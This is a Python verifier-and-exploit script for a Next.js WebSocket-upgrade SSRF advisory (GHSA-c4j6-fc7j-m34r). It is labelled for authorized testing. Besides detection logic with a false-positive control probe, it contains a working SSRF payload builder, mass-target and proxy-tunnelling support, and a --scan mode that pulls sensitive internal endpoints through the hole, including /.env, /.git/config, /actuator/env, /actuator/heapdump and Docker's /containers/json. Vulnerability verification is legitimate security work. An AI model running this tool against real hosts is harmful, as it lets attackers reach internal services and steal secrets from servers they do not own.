README.md
Rendering markdown...
#!/usr/bin/env python3
"""
verify_ghsa_c4j6.py — In-band verifier for GHSA-c4j6-fc7j-m34r / CVE-2026-44578
(Next.js WebSocket-upgrade SSRF; affected: next >=13.4.13 <15.5.16, >=16.0.0 <16.2.5)
For authorized security testing only.
DETECTION MODEL (revised after empirical testing against [email protected] vs 15.5.16):
The vulnerable code path in `resolveRoutes` treats any request URI containing
`//` (which is every absolute-form request-URI) as a "normalize repeated
slashes" case. It collapses the `//` to `/`, then the unpatched upgrade
handler in `router-server.ts` still proxies the result. The mangled target
(`http:/host:port/path` with one slash) loses its host, so Node's URL parser
gives `host=null`, and `http-proxy` falls back to `localhost:80` (HTTPS:443).
The practical SSRF surface is therefore ANY service listening on the Next.js
host's localhost:80 or localhost:443 — with an attacker-controlled path.
Because the connection never reaches an external host, an out-of-band canary
will not receive callbacks. Detection is instead done in-band by reading the
upgrade socket:
- "Internal Server Error" in the response -> VULNERABLE
(Next's http-proxy error handler ran; only the pre-patch path
enters that code branch.)
- Response starts with "HTTP/1." -> VULNERABLE + reachable
(A service on the host's localhost actually answered the proxy.)
- Empty response / clean close -> LIKELY PATCHED / not Next /
behind a reverse proxy that
strips Upgrade
- Anything else -> INCONCLUSIVE
False-positive guard: a control probe with the same absolute-URI request
line but NO Upgrade headers is sent first. If the front-end (nginx/Apache/
CDN) returns the same response to both probes, it is short-circuiting the
malformed request line on its own — the SSRF never reached Next — and the
verdict is downgraded to `front_end_intercepts`. Disable with
--no-control-probe.
Usage:
python3 verify_ghsa_c4j6.py --target https://app1.example.com
python3 verify_ghsa_c4j6.py --targets-file targets.txt --json
cat targets.txt | python3 verify_ghsa_c4j6.py
"""
from __future__ import annotations
import argparse
import asyncio
import base64
import json
import re
import secrets
import ssl
import sys
from urllib.parse import urlsplit
DEFAULT_TIMEOUT = 5.0
DEFAULT_CONCURRENCY = 10
DEFAULT_PROBE_PATH = "/x" # arbitrary; becomes the path on localhost:80 of the target
HTTP_STATUS_RE = re.compile(r"^HTTP/1\.\d (\d{3}) ")
# Common paths that often surface co-located services on localhost. The SSRF
# in this CVE is pinned to the target's localhost:80/443, so these are the
# kinds of paths that can reveal what (if anything) is listening there.
DEFAULT_SCAN_PATHS = [
"/",
"/index.html",
# apache / nginx status modules
"/server-status", "/server-info",
"/nginx_status", "/stub_status",
# health & status
"/health", "/healthz", "/_health", "/status", "/_status", "/ping",
"/ready", "/readyz", "/live", "/livez",
# metrics
"/metrics", "/prometheus", "/_metrics",
# admin panels (common framework defaults)
"/admin", "/admin/", "/administrator/",
"/manager/html", # tomcat
"/console", # weblogic / others
"/wp-admin/", "/wp-login.php",
# generic apis
"/api", "/api/v1", "/api/v2",
# spring boot actuator
"/actuator", "/actuator/env", "/actuator/health",
"/actuator/mappings", "/actuator/beans", "/actuator/configprops",
"/actuator/heapdump", "/actuator/threaddump",
# go pprof / expvar
"/debug/vars", "/debug/pprof/", "/debug/pprof/heap",
# docker daemon over http
"/containers/json", "/version", "/info", "/images/json",
# leaky config files often dropped at webroot
"/.env", "/.git/config", "/.git/HEAD", "/config", "/config.json",
# php classics
"/phpinfo.php", "/info.php", "/phpmyadmin/",
# elasticsearch
"/_cat/indices", "/_cluster/health", "/_nodes",
# jmx / jolokia
"/jmx-console/", "/jolokia/list",
# next.js itself (loopback when next is the localhost service)
"/_next/static/",
]
def build_payload(absolute_uri: str, target_host_header: str) -> bytes:
lines = [
f"GET {absolute_uri} HTTP/1.1",
f"Host: {target_host_header}",
"Connection: Upgrade",
"Upgrade: websocket",
"Sec-WebSocket-Version: 13",
"Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==",
"",
"",
]
return "\r\n".join(lines).encode("latin-1")
def build_control_payload(absolute_uri: str, target_host_header: str) -> bytes:
"""Same absolute-URI request line as the SSRF probe, but with no Upgrade
headers. Used to detect front-end proxies (nginx/Apache/etc) that reject
the request line themselves — those return identical errors with or
without the upgrade headers, which would otherwise produce a false
positive on the `HTTP/1.x` / `Internal Server Error` heuristics."""
lines = [
f"GET {absolute_uri} HTTP/1.1",
f"Host: {target_host_header}",
"Connection: close",
"",
"",
]
return "\r\n".join(lines).encode("latin-1")
def parse_target(url: str) -> tuple[str, int, bool]:
if "://" not in url:
url = "http://" + url
parts = urlsplit(url)
host = parts.hostname
if not host:
raise ValueError(f"invalid target: {url}")
is_tls = parts.scheme == "https"
port = parts.port or (443 if is_tls else 80)
return host, port, is_tls
def parse_proxy(url: str) -> tuple[str, int, str | None, str | None]:
"""Return (host, port, username, password) for an http(s):// CONNECT proxy."""
if "://" not in url:
url = "http://" + url
p = urlsplit(url)
if p.scheme not in ("http", "https"):
raise ValueError(f"unsupported proxy scheme: {p.scheme}")
if not p.hostname:
raise ValueError(f"invalid proxy URL: {url}")
port = p.port or (443 if p.scheme == "https" else 8080)
return p.hostname, port, p.username, p.password
async def _open_via_proxy(
target_host: str,
target_port: int,
ssl_ctx: ssl.SSLContext | None,
proxy_info: tuple[str, int, str | None, str | None],
timeout: float,
):
"""Open a (possibly TLS) connection through an HTTP CONNECT proxy."""
p_host, p_port, p_user, p_pass = proxy_info
reader, writer = await asyncio.wait_for(
asyncio.open_connection(p_host, p_port), timeout=timeout
)
lines = [
f"CONNECT {target_host}:{target_port} HTTP/1.1",
f"Host: {target_host}:{target_port}",
]
if p_user is not None:
creds = f"{p_user}:{p_pass or ''}".encode("latin-1")
token = base64.b64encode(creds).decode("ascii")
lines.append(f"Proxy-Authorization: Basic {token}")
lines.extend(["", ""])
writer.write("\r\n".join(lines).encode("latin-1"))
await writer.drain()
status = await asyncio.wait_for(reader.readline(), timeout=timeout)
if not status:
writer.close()
raise OSError("proxy closed before CONNECT response")
parts = status.decode("latin-1", "replace").split(" ", 2)
if len(parts) < 2 or not parts[1].startswith("2"):
writer.close()
raise OSError(f"CONNECT failed: {status.decode('latin-1','replace').strip()}")
while True:
line = await asyncio.wait_for(reader.readline(), timeout=timeout)
if line in (b"\r\n", b""):
break
if ssl_ctx is not None:
if not hasattr(writer, "start_tls"):
raise RuntimeError(
"TLS over CONNECT proxy requires Python 3.11+"
)
await writer.start_tls(ssl_ctx, server_hostname=target_host)
return reader, writer
def _first_line(snippet: str) -> str:
return snippet.split("\r\n", 1)[0] if snippet else ""
def _responses_match(probe: str, control: str) -> bool:
"""Heuristic: probe response looks like the control (no-upgrade) response,
meaning the front-end short-circuited the request regardless of Upgrade
headers. We compare the status line and total length within a tolerance
so dynamic content like `Date:` doesn't cause false negatives."""
if not probe or not control:
return False
if _first_line(probe) != _first_line(control):
return False
a, b = len(probe), len(control)
return abs(a - b) <= max(50, int(0.10 * max(a, b)))
def classify(snippet: str, control_snippet: str | None = None) -> tuple[str, bool, dict]:
"""Map the raw bytes of the socket reply to (verdict, impact_confirmed, extras).
impact_confirmed is True iff the response shows that the proxied upgrade
actually reached a service on the target's localhost:80/443 and read
something back — i.e. real data exfiltration through the SSRF gadget.
When `control_snippet` is provided (response to the same request line
with `Connection: close` and no Upgrade headers), a front-end-proxy
short-circuit guard runs: if both responses look identical, the host's
own front-end is rejecting/handling the request line itself and the
SSRF never fired — verdict downgrades to `front_end_intercepts`.
"""
extras: dict = {}
if not snippet:
return "likely_patched", False, extras
if control_snippet is not None and _responses_match(snippet, control_snippet):
# Front-end (nginx/Apache/CDN/etc) responded identically to the
# control probe — the upgrade-driven SSRF path is not what we saw.
if snippet.startswith("HTTP/1."):
m = HTTP_STATUS_RE.match(snippet)
if m:
extras["front_end_status"] = int(m.group(1))
for line in snippet.split("\r\n")[1:15]:
low = line.lower()
if low.startswith("server:"):
extras["front_end_server"] = line.split(":", 1)[1].strip()
break
return "front_end_intercepts", False, extras
if snippet.startswith("HTTP/1."):
m = HTTP_STATUS_RE.match(snippet)
if m:
extras["upstream_status"] = int(m.group(1))
# parse a few common headers from the first chunk for operator triage
for line in snippet.split("\r\n")[1:15]:
low = line.lower()
if low.startswith("server:"):
extras["upstream_server"] = line.split(":", 1)[1].strip()
elif low.startswith("content-type:"):
extras["upstream_content_type"] = line.split(":", 1)[1].strip()
return "vulnerable_proxy_succeeded", True, extras
if "Internal Server Error" in snippet:
return "vulnerable", False, extras
return "inconclusive", False, extras
async def _send_payload(
host: str,
port: int,
is_tls: bool,
payload: bytes,
timeout: float,
verify_tls: bool,
proxy_info: tuple | None,
) -> tuple[str, str | None]:
"""Open a (TLS / proxied) socket, send `payload`, read until close.
Returns (snippet, error). Snippet is the bytes decoded as latin-1 (so
binary stays intact). On any connect/send error, error is set and
snippet is empty."""
ssl_ctx: ssl.SSLContext | None = None
if is_tls:
ssl_ctx = ssl.create_default_context()
if not verify_tls:
ssl_ctx.check_hostname = False
ssl_ctx.verify_mode = ssl.CERT_NONE
try:
if proxy_info is not None:
reader, writer = await _open_via_proxy(
host, port, ssl_ctx, proxy_info, timeout
)
elif ssl_ctx is not None:
reader, writer = await asyncio.wait_for(
asyncio.open_connection(host, port, ssl=ssl_ctx, server_hostname=host),
timeout=timeout,
)
else:
reader, writer = await asyncio.wait_for(
asyncio.open_connection(host, port), timeout=timeout
)
except (asyncio.TimeoutError, OSError, ssl.SSLError, RuntimeError) as e:
return "", str(e)
try:
writer.write(payload)
await writer.drain()
data = b""
try:
while len(data) < 8192:
chunk = await asyncio.wait_for(reader.read(4096), timeout=timeout)
if not chunk:
break
data += chunk
except asyncio.TimeoutError:
pass
return data.decode("latin-1", "replace"), None
except OSError as e:
return "", str(e)
finally:
try:
writer.close()
await writer.wait_closed()
except Exception:
pass
async def control_probe(
target: str,
probe_path: str,
timeout: float,
verify_tls: bool,
proxy_info: tuple | None = None,
) -> str | None:
"""Send the same absolute-URI request line as the SSRF probe but with no
Upgrade headers. Returns the response snippet (may be empty), or None if
the connection failed entirely. Used as a control to detect front-end
proxies that short-circuit absolute-URI requests with a generic error
regardless of Upgrade — that would otherwise look like a vulnerable
target."""
try:
host, port, is_tls = parse_target(target)
except ValueError:
return None
host_header = host if port in (80, 443) else f"{host}:{port}"
absolute_uri = "http:///" + probe_path.lstrip("/")
payload = build_control_payload(absolute_uri, host_header)
snippet, err = await _send_payload(
host, port, is_tls, payload, timeout, verify_tls, proxy_info
)
if err is not None and not snippet:
return None
return snippet
async def probe_one(
target: str,
probe_path: str,
timeout: float,
verify_tls: bool,
proxy_info: tuple | None = None,
control_snippet: str | None = None,
) -> dict:
token = secrets.token_hex(8)
try:
host, port, is_tls = parse_target(target)
except ValueError as e:
return {"target": target, "probe_path": probe_path, "token": token,
"status": "invalid", "verdict": "error",
"impact_confirmed": False, "error": str(e)}
host_header = host if port in (80, 443) else f"{host}:{port}"
# Use an empty-authority absolute URI ("http:///<path>"). After Next's
# normalizeRepeatedSlashes collapses the //, the parsed URL becomes
# "http:/<path>"; http-proxy then dials localhost:80 with the request
# path = "/<path>" verbatim — which is what we actually want to probe.
# An earlier "http://canary.invalid/<path>" form caused every probe to
# hit "/canary.invalid/<path>" on the target's localhost service,
# producing only false-positive 404s.
absolute_uri = "http:///" + probe_path.lstrip("/")
payload = build_payload(absolute_uri, host_header)
snippet, err = await _send_payload(
host, port, is_tls, payload, timeout, verify_tls, proxy_info
)
if err is not None and not snippet:
return {"target": target, "probe_path": probe_path, "token": token,
"status": "connect_error", "verdict": "error",
"impact_confirmed": False, "error": err}
verdict, impact_confirmed, extras = classify(snippet, control_snippet)
result = {
"target": target,
"probe_path": probe_path,
"token": token,
"status": "sent",
"verdict": verdict,
"impact_confirmed": impact_confirmed,
"response_snippet": snippet[:500].replace("\r", " ").replace("\n", " "),
}
if control_snippet is not None:
result["control_used"] = True
result.update(extras)
return result
def _response_signature(result: dict) -> tuple:
"""Signature used for differential filtering: (status, body length)."""
if result.get("status") != "sent":
return ("error", result.get("verdict"))
snippet = result.get("response_snippet") or ""
return (result.get("upstream_status"), len(snippet))
async def run(targets, paths, concurrency, timeout, verify_tls,
proxy_info=None, differential=False, use_control=True):
"""Run probes. When `differential` is True, an extra random-path probe
is sent per target first; subsequent probes get a `differential` field
indicating whether their response diverges from that baseline.
When `use_control` is True, an extra no-Upgrade control probe is sent
per target; the response is fed into `classify()` so that front-end
proxies which return identical errors for both probes get reclassified
as `front_end_intercepts` (no false-positive on `HTTP/1.x` / "Internal
Server Error" emitted by the front-end itself)."""
sem = asyncio.Semaphore(concurrency)
async def bound(t, p, ctrl=None):
async with sem:
return await probe_one(t, p, timeout, verify_tls, proxy_info, ctrl)
async def control_for(t, p):
if not use_control:
return None
async with sem:
return await control_probe(t, p, timeout, verify_tls, proxy_info)
if not differential:
# One control per target, reused for every (target, path) probe of
# that target. Path doesn't materially change control behavior for
# front-end short-circuits, and reusing keeps socket budget low.
controls = {t: await control_for(t, paths[0]) for t in targets}
tasks = [bound(t, p, controls.get(t)) for t in targets for p in paths]
return await asyncio.gather(*tasks)
# Differential mode: one baseline per target, then the scan paths.
out: list[dict] = []
for target in targets:
baseline_path = "/" + secrets.token_hex(8) + "-nonexistent"
ctrl = await control_for(target, baseline_path)
baseline = await bound(target, baseline_path, ctrl)
baseline["is_baseline"] = True
baseline_sig = _response_signature(baseline)
out.append(baseline)
scan_tasks = [bound(target, p, ctrl) for p in paths]
scan_results = await asyncio.gather(*scan_tasks)
for r in scan_results:
r["differential"] = (_response_signature(r) != baseline_sig)
out.extend(scan_results)
return out
def load_targets(args) -> list[str]:
targets: list[str] = []
if args.targets_file:
with open(args.targets_file) as f:
for line in f:
line = line.strip()
if line and not line.startswith("#"):
targets.append(line)
if args.target:
targets.extend(args.target)
if not targets and not sys.stdin.isatty():
for line in sys.stdin:
line = line.strip()
if line and not line.startswith("#"):
targets.append(line)
seen = set()
out = []
for t in targets:
if t not in seen:
seen.add(t)
out.append(t)
return out
VERDICT_GLYPH = {
"vulnerable": "VULN",
"vulnerable_proxy_succeeded": "VULN+",
"likely_patched": "OK?",
"front_end_intercepts": "FE",
"inconclusive": "????",
"error": "ERR",
}
def main() -> int:
p = argparse.ArgumentParser(
description="In-band verifier for GHSA-c4j6-fc7j-m34r (Next.js WebSocket-upgrade SSRF)."
)
p.add_argument("--target", action="append", default=[],
help="A target (host:port or URL). Repeat for multiple.")
p.add_argument("--targets-file",
help="File with one target per line (# comments allowed).")
p.add_argument("--probe-path", default=DEFAULT_PROBE_PATH,
help="Path component used in the crafted request-URI. "
"Becomes the path on the target's localhost service. "
f"Default: {DEFAULT_PROBE_PATH}")
p.add_argument("--scan", action="store_true",
help="After detection, probe a built-in list of common "
"paths (status pages, admin panels, actuator, debug "
"endpoints, etc.) to enumerate any service co-located "
"on the target's localhost:80/443.")
p.add_argument("--scan-paths-file",
help="File with paths (one per line, '#' for comments) to "
"use instead of the built-in scan list. Implies --scan.")
p.add_argument("--no-differential", action="store_true",
help="In --scan mode, disable the baseline differential "
"filter (report every probe that reached a service, "
"even uniform 404s). On by default in --scan.")
p.add_argument("--no-control-probe", action="store_true",
help="Disable the front-end short-circuit guard. By "
"default an extra no-Upgrade request is sent per "
"target; if the front-end returns the same response "
"to both, the verdict is downgraded to "
"front_end_intercepts to prevent false positives "
"from nginx/Apache/CDN edges that reject the "
"absolute-URI request line themselves.")
p.add_argument("--timeout", type=float, default=DEFAULT_TIMEOUT)
p.add_argument("--concurrency", type=int, default=DEFAULT_CONCURRENCY)
p.add_argument("--insecure", action="store_true",
help="Skip TLS certificate verification for https targets. "
"Required when --proxy MITMs TLS (e.g. Burp).")
p.add_argument("--proxy",
help="HTTP CONNECT proxy to tunnel through, e.g. "
"http://127.0.0.1:8080 or http://user:pass@host:port "
"(Burp, mitmproxy, OWASP ZAP).")
p.add_argument("--json", action="store_true",
help="Emit JSON Lines instead of human-readable output.")
args = p.parse_args()
targets = load_targets(args)
if not targets:
p.error("provide --target, --targets-file, or pipe targets on stdin")
if args.scan_paths_file:
with open(args.scan_paths_file) as f:
paths = [l.strip() for l in f
if l.strip() and not l.strip().startswith("#")]
scan_mode = True
elif args.scan:
paths = DEFAULT_SCAN_PATHS
scan_mode = True
else:
paths = [args.probe_path]
scan_mode = False
proxy_info = None
if args.proxy:
try:
proxy_info = parse_proxy(args.proxy)
except ValueError as e:
p.error(str(e))
differential = scan_mode and not args.no_differential
use_control = not args.no_control_probe
results = asyncio.run(
run(targets, paths, args.concurrency, args.timeout,
not args.insecure, proxy_info,
differential=differential, use_control=use_control)
)
if args.json:
for r in results:
print(json.dumps(r))
return 0
if scan_mode:
_print_scan(results)
else:
for r in results:
_print_single(r)
# final summary across all results
counts: dict[str, int] = {}
impacts = 0
for r in results:
counts[r["verdict"]] = counts.get(r["verdict"], 0) + 1
if r.get("impact_confirmed"):
impacts += 1
print()
print("overall:")
for verdict, n in sorted(counts.items()):
print(f" {verdict}: {n}")
print(f" impact_confirmed: {impacts}")
return 0
def _print_single(r: dict) -> None:
tag = VERDICT_GLYPH.get(r["verdict"], r["verdict"])
impact = "YES" if r.get("impact_confirmed") else " no"
line = (
f"[{tag:>5}] target={r['target']:<40}"
f" verdict={r['verdict']:<28} impact={impact}"
)
if r.get("upstream_status"):
line += f" upstream={r['upstream_status']}"
if r.get("upstream_server"):
line += f" ({r['upstream_server']!r})"
if r.get("front_end_status"):
line += f" front_end={r['front_end_status']}"
if r.get("front_end_server"):
line += f" ({r['front_end_server']!r})"
if "error" in r:
line += f" error={r['error']}"
print(line)
if r.get("impact_confirmed") and r.get("response_snippet"):
print(f" snippet: {r['response_snippet'][:200]!r}")
elif r.get("response_snippet") and r["verdict"] == "vulnerable":
print(f" snippet: {r['response_snippet'][:80]!r}")
elif r["verdict"] == "front_end_intercepts":
print(f" note: front-end returned identical responses with "
f"and without Upgrade headers — SSRF probe blocked / unreachable")
def _print_scan(results: list[dict]) -> None:
by_target: dict[str, list[dict]] = {}
for r in results:
by_target.setdefault(r["target"], []).append(r)
for target, rows in by_target.items():
print(f"\n=== {target} ===")
baseline = next((r for r in rows if r.get("is_baseline")), None)
scan_rows = [r for r in rows if not r.get("is_baseline")]
any_vuln = any(r["verdict"].startswith("vulnerable") for r in scan_rows)
any_impact = any(r.get("impact_confirmed") for r in scan_rows)
diff_mode = baseline is not None
# If the baseline itself was intercepted by a front-end proxy, the
# whole scan is meaningless — every "hit" is just the proxy echoing
# its generic error. Skip the noisy per-path detail.
if baseline and baseline.get("verdict") == "front_end_intercepts":
fe_s = baseline.get("front_end_status", "-")
fe_srv = baseline.get("front_end_server", "?")
print(f" front-end proxy intercepted both probes "
f"(status={fe_s} server={fe_srv!r})")
print(" SSRF probe never reached Next — try direct against the "
"Next process if you can, or use --no-control-probe to see "
"the raw verdicts.")
continue
if not any_vuln:
print(" (not vulnerable / no signal — skipping detail)")
continue
if diff_mode:
b_status = baseline.get("upstream_status", "-")
b_len = len(baseline.get("response_snippet") or "")
print(f" baseline (random path): verdict={baseline['verdict']:<28}"
f" status={b_status} bytes≈{b_len}")
# Sort: DIFF hits first, then path order
def _sort_key(r):
return (
not r.get("differential", True), # diffs first when diff_mode
not r.get("impact_confirmed"),
r.get("probe_path", ""),
)
for r in sorted(scan_rows, key=_sort_key):
tag = VERDICT_GLYPH.get(r["verdict"], r["verdict"])
impact = "YES" if r.get("impact_confirmed") else " - "
path = r.get("probe_path", "?")
if diff_mode:
if r.get("differential") and r.get("impact_confirmed"):
marker = "DIFF "
elif r.get("impact_confirmed"):
marker = "noise"
else:
marker = " "
else:
marker = ""
line = f" [{tag:>5}] {marker} {path:<30} impact={impact}"
if r.get("upstream_status"):
line += f" status={r['upstream_status']}"
if r.get("upstream_content_type"):
line += f" ct={r['upstream_content_type']!r}"
if r.get("error"):
line += f" err={r['error']}"
print(line)
servers = {r.get("upstream_server")
for r in scan_rows if r.get("upstream_server")}
servers.discard(None)
if diff_mode:
diff_hits = [r for r in scan_rows
if r.get("differential") and r.get("impact_confirmed")]
print(f" -> {len(diff_hits)} differential hit(s) / "
f"{len(scan_rows)} probes")
if servers:
print(f" -> upstream server(s) seen: "
f"{', '.join(sorted(s for s in servers if s))}")
elif any_impact:
hits = [r for r in scan_rows if r.get("impact_confirmed")]
print(f" -> {len(hits)}/{len(scan_rows)} paths reached a service")
if servers:
print(f" -> upstream server(s) seen: "
f"{', '.join(sorted(s for s in servers if s))}")
else:
print(" -> bug present but nothing answering on localhost:80/443")
if __name__ == "__main__":
sys.exit(main())